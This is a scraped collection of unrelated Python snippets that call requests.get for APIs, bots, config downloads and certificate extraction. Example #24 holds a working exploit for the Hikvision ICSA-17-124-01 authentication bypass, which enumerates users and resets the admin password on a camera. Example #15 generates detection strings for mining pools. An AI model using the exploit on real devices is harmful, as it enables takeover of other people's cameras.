Пример #1
0
def obj():
    year = request.values.get('Digits', None)
    r = twiml.Response()
    params = {
        "sourceResource.type": "sound",
        "provider.name": "Kentucky Digital Library",
        "sourceResource.date.begin": str(year),
        "api_key": api_key,
        "page_size": 100
    }
    url = "http://api.dp.la/v2/items/?%s" % urllib.urlencode(params)
    results = rget(url).json()
    if len(results['docs']) < 1:
        r.say("Sorry, nothing matched your query.")
    else:
        if results['count'] > params['page_size']:
            upper_bound = params['page_size'] - 1
        else:
            upper_bound = results['count'] - 1
        index = random.randint(0, upper_bound)
        item = results['docs'][index]
        stream = item['object']
        stream = stream.replace("_tb.mp3", ".mp3")
        phrase = "You are about to listen to: " + item['sourceResource']['title'] + ". "
        phrase += "This item is from " + item['dataProvider'] + "."
        r.say(phrase)
        r.play(stream)
    return str(r)
Пример #2
0
def is_message_signature_valid(msg):
    if msg[u'SignatureVersion'] != '1':
        raise Exception('Wrong signature version')

    signing_url = msg[u'SigningCertURL']
    prog = regex_compile(r'^https://sns\.[-a-z0-9]+\.amazonaws\.com/.*$', IGNORECASE)
    if not prog.match(signing_url):
        raise Exception("Cert is not hosted at AWS URL (https): %s",
                        signing_url)

    r = rget(signing_url)
    cert = X509.load_cert_string(str(r.text))
    str_to_sign = None
    if msg[u'Type'] == 'Notification':
        str_to_sign = build_notification_string(msg)
    elif any(msg[u'Type'] == s for s in ['SubscriptionConfirmation',
                                         'UnsubscribeConfirmation']):
        str_to_sign = build_subscription_string(msg)

    pubkey = cert.get_pubkey()
    pubkey.reset_context(md='sha1')
    pubkey.verify_init()
    pubkey.verify_update(str_to_sign.encode())
    result = pubkey.verify_final(b64decode(msg['Signature']))
    if result != 1:
        raise Exception('Notification could not be confirmed')
    else:
        return True
Пример #3
0
 def get(self, agency, stop_id):
     """
     Submit GET request to agency -> then parse and transform
     the response to JSON object with correct fields.
     """
     self.set_params(agency, stop_id)
     response = rget(self.api_url, params=self.params)
     return self.transform(response)
Пример #4
0
 def download_image(self, url):
     try:
         LOGGER.info('downloading %s' %(url))
         filename = url.split('/')[-1]
         r = rget(url, stream=True)
         if r.status_code == 200:
             with open(path.join(CONTENTSUB['unsorted'], filename), 'wb') as f:
                 for chunk in r.iter_content(1024):
                     f.write(chunk)
             LOGGER.info('done: %s' %(filename))
     except Exception as ex:
         LOGGER.error('download error %s %s' %(url, ex))
Пример #5
0
def startWeb(p,resourcePath,nonesym,timec,timebg,btc,btbg,etc,etbg,showetflag,showbtflag):
    global port, process, static_path, nonesymbol, timecolor, timebackground, btcolor, btbackground, etcolor, etbackground, showet, showbt
    try:
        port = p
        static_path = resourcePath
        nonesymbol = nonesym
        timecolor = timec
        timebackground = timebg
        btcolor = btc
        btbackground = btbg
        etcolor = etc
        etbackground = etbg
        showet = showetflag
        showbt = showbtflag
        if psystem() != 'Windows':
            gsignal(SIGQUIT, kill)
        
        # start the server in a separate process
# using multiprocessing
        process = mProcess(target=work,args=(
            port,
            resourcePath,
            nonesym,
            timec,
            timebg,
            btc,
            btbg,
            etc,
            etbg,
            showetflag,
            showbtflag,))
        process.start()
       
        libtime.sleep(4)
        
        # check successful start
        url = "http://127.0.0.1:" + str(port) + "/status"
        r = rget(url,timeout=2)
        
        if r.status_code == 200:
            return True
        else:
            return False

    except Exception:
#        import traceback
#        import sys
#        traceback.print_exc(file=sys.stdout)
        return False
Пример #6
0
def subscribe(subscription_arn):
    subscription = Subscription.query.get(subscription_arn)
    if subscription.status == 0:
        r = rget(subscription.subscribe_url)
        if r.status_code == 200:
            subscription.status = 1
            db.session.commit()
            flash(u'Subscription confirmed!', 'success')
        else:
            flash(u'Subscription not confirmed! Response code was %i' %
                  r.status_code, 'danger')
    else:
        flash(u'Subscription already confirmed!', 'danger')
    return redirect(url_for('show_subscription',
                    subscription_arn=subscription.arn))
Пример #7
0
def unsubscribe(subscription_arn):
    subscription = Subscription.query.get(subscription_arn)
    if not subscription.unsubscribe_url:
        flash(u'A message must be received to unsubscribe', 'danger')
    elif subscription.status == 1:
        r = rget(subscription.unsubscribe_url)
        if r.status_code == 200:
            subscription.status = 2
            db.session.commit()
            flash(u'Ubsubscription request sent!', 'success')
        else:
            flash((u'Unsubscription request unsuccessful!',
                   u' Response code was %i' % r.status_code), 'danger')
    else:
        flash(u'Subscription is not valid to be unsubscribed!', 'danger')
    return redirect(url_for('show_subscription',
                    subscription_arn=subscription.arn))
Пример #8
0
    rhash = sha512(str(rhash).encode('utf-8')).hexdigest()
    
    try:
        f = open(rfile, 'rb', 0)
        m = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
        nohash = True if m.find(rhash.encode()) == -1 else False
    except (ValueError, FileNotFoundError):
        nohash = True
        
    if nohash:
        with open(rfile, 'a') as f:
            f.write(rhash + '\n')
    
    return nohash

data = rget('https://www.rockstargames.com/newswire/tags.json?tags=702')
page = data.json()
regx = re.compile('GTA\$[1-10]')

mail_list = [ '*****@*****.**' ]

for post in page['posts']:
    blurb = post['blurb']
    title = post['title']
    hash_file = '/home/admin/bin/blurb_hashes.txt'
    
    if (regx.search(blurb) or regx.search(title)) and no_hash(title, hash_file):
        msg = mtext(blurb, 'html')
        msg['Subject'] = re.sub('<[^<]+?>', '', post['title'])
        msg['From'] = '*****@*****.**'
        
Пример #9
0
def handle_file(path):
    response = rget('https://habr.com' + path)
    if not os.path.exists("/".join(path.lstrip("/").split("/")[:-1])):
        os.makedirs("/".join(path.lstrip("/").split("/")[:-1]))
    open(path.lstrip("/"), 'wb').write(response.content)
Пример #10
0
async def time_new(message, client, arguments):

    if not arguments:
        letter = ":clock11: **| Servers time is " + str(
            datetime.fromtimestamp(mfloor(time())).strftime('%H:%M')) + "**"
        await client.send_message(message.channel, letter)
        return

    else:
        google = quote(str(arguments))
        query = "https://maps.googleapis.com/maps/api/geocode/json?address={}&key={}&language={}".format(
            google, google_api_key, "en")
        response = loads(rget(query).text)

        if response["status"] == "OK":

            # getting lat and lng
            lat = str(
                float("{0:.4f}".format(
                    response["results"][0]["geometry"]["location"]["lat"])))
            lng = str(
                float("{0:.4f}".format(
                    response["results"][0]["geometry"]["location"]["lng"])))

            # Getting time by place
            query = "https://maps.googleapis.com/maps/api/timezone/json?location=%s,%s&timestamp=%s&key=%s&language=%s" % (
                lat, lng, time(), google_api_key, "en")
            time_in_location = loads(rget(query).text)

            # Calculating time
            time_now = str(
                int(time() + time_in_location["rawOffset"] +
                    time_in_location["dstOffset"]))
            time_in_hour_format = datetime.fromtimestamp(
                int(time_now)).strftime('%H:%M')
            time_in_weekday = datetime.fromtimestamp(int(time_now)).weekday()

            # Setting weekday
            if time_in_weekday == 0:
                day_is = "Monday"
            elif time_in_weekday == 1:
                day_is = "Tuesday"
            elif time_in_weekday == 2:
                day_is = "Wednesday"
            elif time_in_weekday == 3:
                day_is = "Thursday"
            elif time_in_weekday == 4:
                day_is = "Friday"
            elif time_in_weekday == 5:
                day_is = "Saturday"
            elif time_in_weekday == 6:
                day_is = "Sunday"

            # Sending message
            adsasdadsfdas = ":clock11: **| Time in {} is {} and the day is {}**".format(
                str(response["results"][0]["formatted_address"]),
                time_in_hour_format, day_is)
            await client.send_message(message.channel, adsasdadsfdas)
            return

    send(1, "Time done!")
Пример #11
0
def get_gh_data(username):
    url = f"https://api.github.com/users/{username}/events"
    headers = {"Authorization": f"Bearer {TOKEN}"}
    data = rget(url, headers=headers)
    return data.json()
Пример #12
0
def scrape(url):
    '''returns remote json'''
    try:
        return rget(url).json()
    except Exception as ex:
        print('Error: %s' % (ex))
Пример #13
0
if ospath.exists('log.txt'):
    with open('log.txt', 'r+') as f:
        f.truncate(0)

logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[logging.FileHandler('log.txt'),
              logging.StreamHandler()],
    level=logging.INFO)

CONFIG_FILE_URL = environ.get('CONFIG_FILE_URL', None)
try:
    if len(CONFIG_FILE_URL) == 0:
        raise TypeError
    try:
        res = rget(CONFIG_FILE_URL)
        if res.status_code == 200:
            with open('config.env', 'wb+') as f:
                f.write(res.content)
                f.close()
        else:
            logging.error(f"Failed to download config.env {res.status_code}")
    except Exception as e:
        logging.error(f"CONFIG_FILE_URL: {e}")
except TypeError:
    pass

load_dotenv('config.env', override=True)

UPSTREAM_REPO = environ.get('UPSTREAM_REPO', None)
try:
Пример #14
0
 async def meme(self, ctx):
     data = rget('https://meme-api.herokuapp.com/gimme').json()
     embed = (Embed(title=f":speech_balloon: r/{data['subreddit']} :",
                    color=0x3498db).set_image(url=data['url']).set_footer(
                        text=data['postLink']))
     await ctx.send(embed=embed)
Пример #15
0
from requests import get as rget

headers = {
	'authority': 'data.miningpoolstats.stream',
	'accept': 'application/json, text/javascript, */*; q=0.01',
	'sec-fetch-dest': 'empty',
	'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36',
	'origin': 'https://miningpoolstats.stream',
	'sec-fetch-site': 'same-site',
	'sec-fetch-mode': 'cors',
	'referer': 'https://miningpoolstats.stream/monero',
	'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' 
}


link = 'https://data.miningpoolstats.stream/data/monero.js?t=1587210437'

for line in rget(link, headers=headers).json().get('data'):
	if line.get('pool_id'): print('$ = "{}" ascii fullword'.format(line.get('pool_id')))

Пример #16
0
LOGGER = logging.getLogger(__name__)

load_dotenv('config.env', override=True)


def getConfig(name: str):
    return environ[name]


try:
    NETRC_URL = getConfig('NETRC_URL')
    if len(NETRC_URL) == 0:
        raise KeyError
    try:
        res = rget(NETRC_URL)
        if res.status_code == 200:
            with open('.netrc', 'wb+') as f:
                f.write(res.content)
                f.close()
        else:
            logging.error(f"Failed to download .netrc {res.status_code}")
    except Exception as e:
        logging.error(f"NETRC_URL: {e}")
except KeyError:
    pass
try:
    SERVER_PORT = getConfig('SERVER_PORT')
    if len(SERVER_PORT) == 0:
        raise KeyError
except KeyError:
Пример #17
0
    def fetch_git(self):
        try:
            servers = self.settings.get("git", "servers").split(",")
            auth = {'PRIVATE-TOKEN': self.settings.get("git", "token")}
            url = ("https://%s/api/v3/projects" %
                   self.settings.get("git", "host"))
            for server in servers:
                try:
                    id_proj = rget(
                        "%s/%s%%2F%s" %
                        (url, self.settings.get("git", "group"), server),
                        headers=auth
                    ).json()[u'id']
                except:
                    logging.warning("Repository %s does not exists" % server)
                else:
                    sha = rget(
                        "%s/%s/repository/commits" % (url, id_proj),
                        headers=auth).json()[0][u'id']
                    for filepath in ['usr/local/etc/nginx/nginx.conf',
                                     'usr/local/etc/haproxy/haproxy.cfg',
                                     'etc/nginx/nginx.conf',
                                     'etc/haproxy/haproxy.cfg',
                                     'nginx.conf']:
                        try:
                            params = {'filepath': filepath}
                            main_file = rget(
                                "%s/%s/repository/blobs/%s" %
                                (url, id_proj, sha),
                                params=params, headers=auth)
                            if main_file.status_code != 200:
                                continue
                            with open(
                                pjoin(
                                    self.configs,
                                    "%s.%s.all" %
                                    (splitext(basename(filepath))[0], server)
                                ), "w"
                            ) as config:
                                main_file = main_file.text

                                for incl in findall(
                                    r"(?:^i|^[ \t]+i)nclude (.+?);$",
                                    main_file, REM
                                ):
                                    try:
                                        params = {
                                            'filepath':
                                            pjoin(dirname(filepath), incl)
                                        }
                                        include_file = rget(
                                            "%s/%s/repository/blobs/%s"
                                            % (url, id_proj, sha),
                                            params=params, headers=auth)
                                        if include_file.status_code == 200:
                                            main_file = main_file.replace(
                                                "include " + incl + ";",
                                                include_file.text)
                                    except:
                                        pass
                                config.write(main_file)
                        except:
                            pass
        except:
            logging.error("can't fetch from GitLab: %s" %
                          self.settings.get('git', 'host'))
Пример #18
0
    def write(self, cat):
        servers = set()
        for service in self.services[cat].keys():
            for server_name in self.services[cat][service].keys():
                try:
                    server_name = self.same_hosts.search(server_name).group(1)
                except (AttributeError, IndexError):
                    pass
                servers.add(server_name)
        servers = sorted(servers)
        columns = servers + ["author"]
        services1 = {0: [], 1: []}
        for service in self.services[cat].keys():
            c = (0 if len(self.services[cat][service].keys()) > 1 and
                 "DNS" not in cat and "NIC" not in cat else 1)
            services1[c].append(
                (service, None if c < 1
                 else servers.index(
                    next(iter(self.services[cat][service].keys()))
                 ))
            )

        def skip_www(cs):
            # Use for sorting
            s = cs[0]
            if len(s) > 4 and "www." in s[:4]:
                return s[4:] + " "
            else:
                return s

        services = (
            sorted(services1[0], key=skip_www) +
            sorted(services1[1], key=skip_www)
        )
        result_services = []
        for (service, zone) in services:
            errors = False
            result_service = {'zone': zone}

            clear_service = service
            dotted = False
            if clear_service[0] == ".":
                clear_service = clear_service[1:]
                dotted = True
            if ":443" in clear_service:
                clear_service = "https://" + clear_service.replace(":443", "")
            result_service['service'] = clear_service
            result_service['dotted'] = dotted
            skipped_cat = False
            try:
                for candidate in self.settings.get("git",
                                                   "skipped").split(","):
                    if candidate in self.services[cat][service].keys():
                        skipped_cat = True
                        break
            except parseError:
                pass
            if (cat == "web" or cat == "promo") and not skipped_cat:
                history = 0
                if "https://" in clear_service:
                    url = clear_service
                else:
                    url = "http://" + clear_service
                url = url.split(",")[0]
                try:
                    if cat == "promo":
                        r = rget("%s/favicon.ico" % url, timeout=5)
                        if r.status_code != 200:
                            result_service['no_fav'] = True
                        elif "image/x-icon" not in r.headers['content-type']:
                            result_service['bad_fav'] = True
                        history += len(r.history)
                        r = rget("%s/robots.txt" % url, timeout=5)
                        if r.status_code != 200:
                            result_service['no_robots'] = True
                        elif "text/plain" not in r.headers['content-type']:
                            result_service['bad_robots'] = True
                        history += len(r.history)
                        r = rget("%s/sitemap.xml" % url, timeout=5)
                        if r.status_code != 200:
                            result_service['no_sitemap'] = True
                        elif "text/xml" not in r.headers['content-type']:
                            result_service['bad_sitemap'] = True
                        r = rget(url, timeout=5)
                        history += len(r.history)
                        if len(r.history):
                            result_service['redirect'] = True
                        if r.headers.get('x-powered-by'):
                            result_service['x_powered_by'] = True
                        for head_name, header in r.headers.items():
                            if "set-cookie" in head_name:
                                continue
                            h = list(
                                map(lambda s: s.strip(), header.split(","))
                            )
                            if len(h) > len(set(h)):
                                result_service['double_header_same'] = True
                                break

                        if "<h1" not in r.text:
                            result_service['no_h1'] = True
                        if "<title" not in r.text:
                            result_service['no_title'] = True
                        if 'name="description"' not in r.text:
                            result_service['no_description'] = True

                    else:
                        r = rget(url, timeout=5)
                        history += len(r.history)
                        if len(r.history):
                            result_service['redirect'] = True
                        if r.headers.get('x-powered-by'):
                            result_service['x_powered_by'] = True
                        for head_name, header in r.headers.items():
                            if "set-cookie" in head_name:
                                continue
                            h = list(
                                map(lambda s: s.strip(), header.split(","))
                            )
                            if len(h) > len(set(h)):
                                result_service['double_header_same'] = True
                                break

                except SSLError:
                    result_service['insecure'] = True
                except Exception as e:
                    result_service['no_url'] = e

            result_service['servers'] = []
            for server in servers:
                if server not in self.services[cat][service].keys():
                    if "NIC" in cat and "NS" in server:
                        errors |= True
                    result_service['servers'].append(None)
                    continue

                if "NIC" in cat and "NS" in server:
                    temp_result = []
                    for ip, stat in sorted(
                            self.services[cat][service][server]):
                        temp_result.append({'ip': ip, 'stat': stat})
                        if not stat:
                            errors |= True
                    result_service['servers'].append(temp_result)

                elif "TXT" not in server:
                    result_service['servers'].append(
                        [{'ip': ip}
                         for ip in sorted(self.services[cat][service][server])]
                    )
                if "NIC" in cat and "TXT" in server:
                    if u"Не делегирован" not in u"".join(
                            self.services[cat][service]["    Status"]):
                        spf, dmarc = self.services[cat][service][server]
                        result_service['servers'].append(
                            [{'ip': 'spf ', 'spf': spf},
                             {'ip': 'dmarc ', 'dmarc': dmarc}]
                        )
                        if spf or dmarc:
                            errors |= True

            if cat == "web" or cat == "promo" or cat == "stream":
                result_service['author'] = " ".join(
                    filter(len, self.authors.get(service, {}))
                )
            result_service['errors'] = errors

            result_services.append(result_service)

        try:
            template = self.tpl.get_template(cat + ".html")
        except TemplateNotFound:
            template = self.tpl.get_template("_table.html")

        return template.render(services=result_services,
                               columns=columns,
                               servers=servers,
                               cat=cat)
Пример #19
0
    data['token'] = token
    with open("config.json", "w", encoding="utf-8") as token_:
        token_.write(json.dumps(data, indent=4))

user = User(data['token'], mobile=True)


from src.commands import iris,id,signals,time, like, calc,wiki,msgdel,addfriends,commentadd,info,random,online,commands,shubs
import unit
from requests import get as rget
from unit import __version__, __author__, __namelp__
user.set_blueprints(time.bp,unit.bp,like.bp,
calc.user,wiki.bp,msgdel.bp,
addfriends.bp,info.bp,commentadd.bp,
random.bp,online.bp,commands.bp,shubs.bp,signals.bp, id.bp,iris.bp)
user_id = (rget(f'https://api.vk.com/method/users.get?&v=5.52&access_token={token}').json())['response'][0]['id']
async def start():
    from unit import __author__, __version__, __namelp__
    text = f"""
📘 {__namelp__} LP запущен.
📕 Версия LP: {__version__}
📙 Автор: {__author__}
    """
    await user.api.messages.send(peer_id=user_id, message=text, random_id=0)
    from loguru import logger as lg
    from prefixs import p
    from prefixs import stickerforstart, error_stickerforstart
    from unit import __version__, __author__


    red = lg.level("[LenderLP]", no=38, color="<yellow>")
Пример #20
0
def look_for_new_video():
    """
    Looks for the new video of the channel specified.
    """

    # api key and channel id
    api_key = "YOUTUBE API KEY HERE"  # GET IT FROM HERE https://console.developers.google.com/apis/api/youtube.googleapis.com
    channel_id = "CHANNEL ID YOU WANT TO TRACK"
    channel_name = "CHANNEL NAME YOU WANT TO TRACK"

    # base video url for youtube
    # base search url for the video search using youtube api
    base_video_url = "https://www.youtube.com/watch?v="
    base_search_url = "https://www.googleapis.com/youtube/v3/search?"

    # main url for api search
    url = base_search_url + f"key={api_key}&channelId={channel_id}&part=snippet,id&order=date&maxResults=1"

    # initialising old video id
    r = rget(url).text
    parser = jloads(r)
    old_vidID = (parser['items'][0]['id']['videoId'])

    # intialising toaster object for notifications
    toaster = ToastNotifier()

    tries = 0
    while True:
        # initialising the new video url until new video is published
        r = rget(url).text
        parser = jloads(r)
        new_vidID = (parser['items'][0]['id']['videoId'])

        # when new video is not published, i.e. new video id is same as old video id
        if new_vidID == old_vidID:
            tries += 1
            print(f"Try {tries}: No new video!")
            sleep(30)

        # when new video has been published, i.e. new video id is different
        else:
            try:
                # fetching video title from the api data
                title = parser['items'][0]['snippet']['title']

                # alerting the user by a notification and speaking
                toaster.show_toast(
                    f"Youtube Tracker",
                    f"New video from {channel_name} has arrived!\nTitle: {title}",
                    duration=5)

                speak(f"New video has arrived! Title is:")
                speak(title)

                # opening the video on the default browser
                videoURL = base_video_url + new_vidID
                webbrowser.open(videoURL)

            except KeyboardInterrupt:
                raise SystemExit

            except Exception as e:
                print(e)
                raise SystemExit
Пример #21
0
 def url_scrape(self, url, split=False):
     try:
         LOGGER.info('scraping %s' %(url))
         return rget(url).text.split('\n') if split else rget(url).text
     except Exception as ex:
         LOGGER.error('scrape error %s %s' %(url, ex))
Пример #22
0
 def get_response_from_link(self, url: str) -> Response:
     return rget(url)
Пример #23
0
def scrape(url):
    '''returns remote json'''
    try:
        return rget(url).json()
    except Exception as ex:
        print('Error: %s' %(ex))
Пример #24
0
def icsa_17_124_01(target, action) -> bool:
    """Detect vulnerability ICSA-17-124-01 or exploit it to change 'admin' password.\n"""
    global HOSTS
    ip_a = str(target)
    params = {'auth': 'YWRtaW46MTEK'}
    if action == 'detect':
        url = f'http://{ip_a}/Security/users'
        try:
            r = rget(url=url, params=params, timeout=10)
            if r.status_code == 200:
                try:
                    r_xmlroot = etree.fromstring(r.content)
                    for actual_user in r_xmlroot:
                        HOSTS[ip_a].user_list.add(
                            HikUser(
                                user_id=actual_user.find('id').text,
                                user_name=actual_user.find('userName').text,
                                priority=actual_user.find('priority').text,
                                user_level=actual_user.find('userLevel').text))
                    return True
                except Exception as exception:
                    print(exception)
                    print(
                        '[!] Error: Failed to understand device response and enumerate users.\nResponse:'
                    )
                    print(r.content)
                    return False
            else:
                return False
        except rexceptions.Timeout:
            print('Connection timed out! Host may no be reachable.')
            return False
    elif action == 'password_change':
        while True:
            psw = getpass(
                '\nEnter a password composed by numbers and letters (8-12 characters):\n\t>>> '
            )
            if 8 <= len(psw) <= 12:
                break
        url = f'http://{ip_a}/Security/users/1'
        xml = f'<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema"><id>1</id>' \
              f'<userName>admin</userName><password>{psw}</password></User>'
        try:
            r = rput(url=url, params=params, data=xml, timeout=10)
            if r.status_code == 200:
                try:
                    r_xmlroot = etree.fromstring(r.content)
                    if int(
                            r_xmlroot.find('statusCode').text
                    ) == 1 and r_xmlroot.find('statusString').text == 'OK':
                        return True
                except Exception as exception:
                    print(exception)
                    print(
                        '[!] Error: Failed to understand device response to psw change.\nResponse:'
                    )
                    print(r.content)
                    return False
            else:
                return False
        except rexceptions.Timeout:
            print('Connection timed out! Host may no be reachable.')
            return False
Пример #25
0
from time import sleep
from requests import get as rget
from os import environ
from logging import error as logerror

BASE_URL = environ.get('BASE_URL_OF_BOT', None).rstrip("/")
try:
    if len(BASE_URL) == 0:
        raise TypeError
except TypeError:
    BASE_URL = None
PORT = environ.get('PORT', None)
if PORT is not None and BASE_URL is not None:
    while True:
        try:
            rget(BASE_URL).status_code
            sleep(600)
        except Exception as e:
            logerror(f"alive.py: {e}")
            sleep(2)
            continue
Пример #26
0
def startWeb(p, resourcePath, nonesym, timec, timebg, btc, btbg, etc, etbg,
             showetflag, showbtflag):
    global port, process, static_path, nonesymbol, timecolor, timebackground, btcolor, btbackground, etcolor, etbackground, showet, showbt
    port = p
    static_path = resourcePath
    nonesymbol = nonesym
    timecolor = timec
    timebackground = timebg
    btcolor = btc
    btbackground = btbg
    etcolor = etc
    etbackground = etbg
    showet = showetflag
    showbt = showbtflag
    if psystem() != 'Windows':
        gsignal(SIGQUIT, kill)

    # start the server in a separate process
    # using multiprocessing
    if psystem() == 'Darwin':
        try:
            # start method can only be set once!
            #            if "fork" in mp.get_all_start_methods():
            #                mp.set_start_method('fork') # default on Python3.7 for macOS (and Unix), but considered unsafe,
            # not available on Windows, on Python3.8 we have to explicitly set this
            # https://bugs.python.org/issue33725
            if "forkserver" in mp.get_all_start_methods():
                mp.set_start_method(
                    'forkserver'
                )  # only available on Python3 on Unix, currently (Python 3.8) not supported by frozen executables generated with pyinstaller


#            if "spawn" in mp.get_all_start_methods():
#                mp.set_start_method('spawn') # default on Python3.8 for macOS (always default on Windows)
# this breaks on starting WebLCDs in macOS (and linux) builds with py2app, pyinstaller
# https://bugs.python.org/issue32146
# https://github.com/pyinstaller/pyinstaller/issues/4865
        except:
            pass
    process = mp.Process(name='WebLCDs',
                         target=work,
                         args=(
                             port,
                             resourcePath,
                             nonesym,
                             timec,
                             timebg,
                             btc,
                             btbg,
                             etc,
                             etbg,
                             showetflag,
                             showbtflag,
                         ))
    process.start()

    libtime.sleep(4)

    if process.is_alive():
        # check successful start
        url = "http://127.0.0.1:" + str(port) + "/status"
        r = rget(url, timeout=2)

        if r.status_code == 200:
            return True
        else:
            return False
    else:
        return False
Пример #27
0
async def ao_ruoka(message, client, arguments):

    # Variables
    food, add_food_with_this, letter, count = [], [], "", 0

    # PAge address
    page = rget(
        "https://www.jao.fi/fi/Jyvaskylan-koulutuskuntayhtyma/Asiakaspalvelut/Palvelut-Jyvaskylassa/Opiskelijaravintolat/Lounastuuli"
    )
    soup = BeautifulSoup(page.content, "lxml")
    kappa = soup.find_all("div", {"class": "day"})

    # for each day in week
    for asd in kappa:

        # Adding weekday
        KEEPO = asd.find("span", {"class": "dayname"})
        KAPPA = KEEPO.text.title()
        add_food_with_this.append("__" + KAPPA + "__:")

        # For each lunch in day
        for auto in asd.find_all("span", {"class": "lunch"}):
            auto = auto.text
            add_food_with_this.append(auto)

        # add day
        food.append(add_food_with_this)
        add_food_with_this = []

    if len(arguments) == 0:
        # Format
        for weekday in food:

            # Indent if todays food
            wrapper = ""
            if datetime.today().weekday() == count and count < 5:
                wrapper = "**"

                # Wrapping
                letter += wrapper + "\n".join(
                    weekday
                ) + wrapper + "\n\n__{}ao week__ for the whole week!".format(
                    starter)
            elif datetime.today().weekday() >= 5 and count == 5:
                letter += wrapper + "\n".join(
                    weekday
                ) + wrapper + "\n\nThis is for the next weeks mondays food!\n__{}ao week__ for the whole week!".format(
                    starter)
            count += 1

    else:
        # Format
        for weekday in food:

            # Indent if todays food
            if count == 5:
                letter += "**=====================\n\n**"

            # Wrapping
            letter += "\n".join(weekday) + "\n\n"
            count += 1

    # Send message
    if not letter == "":
        await client.send_message(message.channel, letter)
Пример #28
0
def get_image(url):
    from image_converter import bytes_to_image, default_image
    try:
        return bytes_to_image(rget(url).content)
    except:
        return default_image()
Пример #29
0
def _fetch_ipstack(address: str) -> dict:
    try:
        return rget(_get_url(address)).json()
    except ConnectionError:
        raise ConnectionError(IPSTACK_UNAVAILAVLE)
Пример #30
0
#!/usr/bin/env python

from requests import get as rget
from zipfile import ZipFile
from StringIO import StringIO
from base64 import b64encode
from os import path as os_path


def error(text):
    sys.stderr.write(text + "\n")
    exit(1)

archive = rget("http://ipgeobase.ru/files/db/Main/geo_files.zip")
if archive.status_code != 200:
    error("IPGeobase no answer: %s" % archive.status_code)

extracteddata = ZipFile(StringIO(archive.content))

filelist = extracteddata.namelist()
if "cities.txt" not in filelist:
    error("cities.txt not downloaded")
if "cidr_optim.txt" not in filelist:
    error("cidr_optim.txt not downloaded")

database = {}

REGIONS = dict(l.decode("utf8").rstrip().split("\t")[::-1]
               for l in open(
                   os_path.dirname(os_path.realpath(__file__)) +
                   "/regions.tsv").readlines())
Пример #31
0
def get_install_requires(filename):
    with open(filename,'r') as f:
        lines = f.readlines()
    return [x.strip() for x in lines]

# 
url = 'https://github.com/GoodManWEN/aiohttp-jwtplus'
release = f'{url}/releases/latest'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
    "Connection": "keep-alive",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8"
}

html = BeautifulSoup(rget(url , headers).text ,'lxml')
description = html.find('meta' ,{'name':'description'}).get('content')
html = BeautifulSoup(rget(release , headers).text ,'lxml')
version = html.find('div',{'class':'release-header'}).find('a').text
logger.info(f"description: {description}")
logger.info(f"version: {version}")

#
with open('README.md','r',encoding='utf-8') as f:
    long_description_lines = f.readlines()

long_description_lines_copy = long_description_lines[:]
long_description_lines_copy.insert(0,'r"""\n')
long_description_lines_copy.append('"""\n')

# update __init__ docs
#!/usr/bin/env python

from requests import get as rget
from zipfile import ZipFile
from StringIO import StringIO
from base64 import b64encode
from os import path as os_path


def error(text):
    sys.stderr.write(text + "\n")
    exit(1)

archive = rget("http://ipgeobase.ru/files/db/Main/geo_files.zip")
if archive.status_code != 200:
    error("IPGeobase no answer: %s" % archive.status_code)

extracteddata = ZipFile(StringIO(archive.content))

filelist = extracteddata.namelist()
if "cities.txt" not in filelist:
    error("cities.txt not downloaded")
if "cidr_optim.txt" not in filelist:
    error("cidr_optim.txt not downloaded")

database = {}

REGIONS = dict(l.decode("utf8").rstrip().split("\t")[::-1]
               for l in open(
                   os_path.dirname(os_path.realpath(__file__)) +
                   "/regions.tsv").readlines())
Пример #33
0
def get_cert(parsed, extracted_table):
    try:
        mapped = {
            b'CN': b'Common Name',
            b'OU': b'Organizational Unit',
            b'O': b'Organization',
            b'L': b'Locality',
            b'ST': b'State Or Province Name',
            b'C': b'Country Name'
        }
        original_connect = VerifiedHTTPSConnection.connect

        def hooked_connect(self):
            global X509
            original_connect(self)
            X509 = self.sock.connection.get_peer_certificate()

        VerifiedHTTPSConnection.connect = hooked_connect
        headers = {'User-Agent': parsed['useragent_mapped']}
        if parsed['use_proxy']:
            proxies = {'http': parsed['proxy'], 'https': parsed['proxy']}
            rget(parsed['buffer'], proxies=proxies, headers=headers, timeout=2)
        else:
            rget(parsed['buffer'], headers=headers, timeout=2)
        List_ = {}
        List_['Subjects'] = []
        for subject in X509.get_subject().get_components():
            try:
                List_['Subjects'].append({
                    mapped[subject[0]].decode('utf-8'):
                    subject[1].decode('utf-8')
                })
            except BaseException:
                pass
        List_['Subject Hash'] = X509.get_subject().hash()
        List_['Issuer'] = []
        for issuer in X509.get_issuer().get_components():
            try:
                List_['Issuer'].append({
                    mapped[issuer[0]].decode('utf-8'):
                    issuer[1].decode('utf-8')
                })
            except BaseException:
                pass
        List_['Issuer Hash'] = X509.get_issuer().hash()
        List_['Extensions'] = []
        for extension in range(X509.get_extension_count()):
            List_['Extensions'].append({
                X509.get_extension(extension).get_short_name().decode('utf-8'):
                X509.get_extension(extension).__str__()
            })
        List_['Expired'] = X509.has_expired()
        List_['Valid From'] = X509.get_notBefore().decode('utf-8')
        List_['Valid Until'] = X509.get_notAfter().decode('utf-8')
        List_['Signature Algorithm'] = X509.get_signature_algorithm().decode(
            'utf-8')
        List_['Serial Number'] = X509.get_serial_number()
        List_['MD5 Digest'] = X509.digest('md5').decode('utf-8')
        List_['SHA1 Digest'] = X509.digest('sha1').decode('utf-8')
        List_['SHA224 Digest'] = X509.digest('sha224').decode('utf-8')
        List_['SHA256 Digest'] = X509.digest('sha256').decode('utf-8')
        List_['SHA384 Digest'] = X509.digest('sha384').decode('utf-8')
        List_['SHA512 Digest'] = X509.digest('sha512').decode('utf-8')
        extracted_table.insert({'Certificate': List_})
        print("[SandBox] extracted certificate")
    except BaseException:
        print("[SandBox] get_cert failed")